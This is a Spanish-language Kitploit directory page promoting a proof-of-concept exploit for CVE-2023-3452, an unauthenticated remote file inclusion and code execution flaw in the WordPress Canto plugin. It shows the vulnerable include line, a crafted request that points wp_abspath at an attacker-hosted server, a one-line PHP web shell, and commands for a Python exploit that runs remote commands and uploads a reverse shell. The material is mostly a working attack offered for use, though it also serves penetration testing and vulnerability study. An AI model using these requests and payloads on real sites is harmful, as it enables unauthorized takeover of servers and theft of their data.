Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/leoanggal1/cve-2023-3452-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubleoanggal1/cve-2023-3452-poc

CVE-2023-3452-PoC

Plugin de WordPress Canto < 3.0.5 - Inclusión Remota de Archivos (RFI) y Ejecución Remota de Código (RCE)

Ver Repositorio
171hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-3452-PoC - Plugin Canto de WordPress < 3.0.5 - Inclusión Remota de Archivos (RFI) - Ejecución Remota de Código (RCE) - No autenticado

Aquí explicamos un PoC de la última vulnerabilidad de RFI (Inclusión Remota de Archivos) del plugin Canto de WordPress, y hemos desarrollado un exploit para automatizar la ejecución de comandos.

"El plugin Canto para WordPress es vulnerable a la Inclusión Remota de Archivos en versiones hasta la 3.0.4 inclusive, a través del parámetro 'wp_abspath'. Esto permite a atacantes no autenticados incluir y ejecutar código remoto arbitrario en el servidor, siempre que allow_url_include esté habilitado. La Inclusión Local de Archivos también es posible, aunque menos útil, porque requiere que el atacante pueda subir un archivo php malicioso mediante FTP u otros medios a un directorio legible por el servidor web." (https://nvd.nist.gov/vuln/detail/CVE-2023-3452)

Este exploit aprovecha un bug en el parámetro wp_abspath como se puede ver en la siguiente línea de código includes/lib/download.php:

root@kitploit:~
...

require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php');

...

Para explotar esta vulnerabilidad también es necesario que el parámetro allow_url_include=On esté habilitado en la configuración de php.

Es posible hacer peticiones con este parámetro apuntando a nuestro servidor web, desde el cual se interpretará código php. Por ejemplo, si hacemos la siguiente petición, podemos comprobar que recibimos la petición en nuestro servidor.:

root@kitploit:~
http://192.168.1.142/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://192.168.1.33:8080

image

Vemos que el servidor llama al archivo /wp-admin/admin.php, por lo que si creamos el directorio y añadimos nuestro código php malicioso al archivo admin.php, el servidor vulnerable lo descarga y lo ejecuta correctamente. Por ejemplo, si escribimos en nuestro archivo admin.php una web-shell php <?php system($_GET['cmd']); ?> podemos ejecutar código remotamente.

root@kitploit:~
http://192.168.1.142/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://192.168.1.33:8080&cmd=whoami

image

Todo esto se ha automatizado en el exploit de python: CVE-2023-3452.py

Uso del exploit

  • Ejecutando un comando remoto:
root@kitploit:~
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'

image

  • Subiendo la Reverse Shell de Pentesmonkey:
root@kitploit:~
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -NC_PORT 3333 -s php-reverse-shell.php

image

Referencias

  • https://nvd.nist.gov/vuln/detail/CVE-2023-3452
  • https://wordpress.com/es/plugins/canto

Contacto

  • Correo electrónico: [email protected]
  • LinkedIn: Leopoldo Angulo Gallego
Descargar herramienta